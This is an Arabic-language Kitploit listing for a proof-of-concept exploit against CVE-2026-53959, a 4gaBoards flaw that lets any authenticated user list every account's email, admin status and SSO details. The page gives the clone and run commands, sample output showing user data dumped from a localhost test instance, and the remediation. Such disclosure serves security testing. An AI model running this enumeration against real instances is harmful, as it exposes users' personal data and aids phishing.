Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-53959 — 4gaBoards < 3.3.9 - كشف معلومات المستخدم | Kitploit
أدوات/GitHubGitHub/anirbala98/cve-2026-53959
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراقالتعلم والتعليمأمن واجهات برمجة التطبيقات
GitHubanirbala98/cve-2026-53959

CVE-2026-53959

4gaBoards < 3.3.9 - كشف معلومات المستخدم

عرض المستودع
1منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-53959 - 4gaBoards < 3.3.9 - كشف معلومات المستخدم

يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لـ CVE-2026-53959

إخلاء مسؤولية

هذا المشروع مقدم لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها.

نظرة عامة

4gaBoards هو نظام لوحات لإدارة المشاريع في الوقت الفعلي. قبل الإصدار 3.3.9، كان 4gaBoards يسمح لأي مستخدم مصادق عليه بتعداد معلومات الحساب لكل مستخدم عبر GET /api/users واسترجاع حسابات عشوائية عبر GET /api/users/:id. تعتمد إجراءات users/index و users/show فقط على سياسة المصادقة الافتراضية في server/config/policies.js، ويعيد server/api/controllers/users/index.js نتيجة sails.helpers.users.getMany() دون تفويض خاص بالطالب أو تنقية للاستجابة. تكشف الاستجابات عن البريد الإلكتروني والهاتف والمؤسسة والاسم وisAdmin وssoGoogleEmail وssoGithubEmail وحقول بريد إلكتروني أخرى مرتبطة بـ SSO، بما في ذلك بيانات المسؤولين. يتيح هذا تعدادًا شاملًا لمستخدمي المثيل، وفقدان الخصوصية، واستطلاعًا موجهًا للتصيد الاحتيالي. تم إصلاح هذه المشكلة في الإصدار 3.3.9.

الإصدارات المتأثرة

المكوّنالإصدار
المعرض للخطر<=3.3.8
المصحح3.3.9

المتطلبات

  • Python 3.13.14
  • Requests 2.32.5

التثبيت

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-53959.git
cd CVE-2026-53959/
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python exploit.py <base_url>
python exploit.py http://localhost:3000

مثال

root@kitploit:~
└─$ python exploit.py http://localhost:3000
[*] Creating a new user...
[+] Registration successful! 
[+] Retrieved Access Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjRjOTE1NzNmLTY5YzktNGQ5OS04ZWUxLWQ1ODZjNzZkNzAyZiJ9.eyJpYXQiOjE3ODcxMjExNzUsInN1YiI6IjE4NDQ5MDI5OTc5OTQyNDMzNTAiLCJleHAiOjE4MTg2NTcxNzV9.OwNTyxE-JS0pztbX4sLz0uzu3GjeyETNFQVbGVxzXxA

[*] Dumping user information...

{"items":[{"id":"1844837973439284230","createdAt":"2026-08-19T04:23:44.000Z","updatedAt":null,"email":"[email protected]","isAdmin":true,"isVerified":false,"name":"Demo Demo","username":"demo","phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":"2026-08-19T06:29:23.463Z","lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844837973439284230","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null},{"id":"1844902997994243350","createdAt":"2026-08-19T06:32:55.000Z","updatedAt":null,"email":"[email protected]","isAdmin":false,"isVerified":false,"name":"test","username":null,"phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":null,"lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844902997994243350","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null}]}

المعالجة

قم بترقية 4gaBoards إلى الإصدار 3.3.9 أو أحدث.

المراجع

  • https://www.tenable.com/cve/CVE-2026-53959
  • https://github.com/RARgames/4gaBoards/security/advisories/GHSA-p77f-p47g-h72p
تنزيل الأداة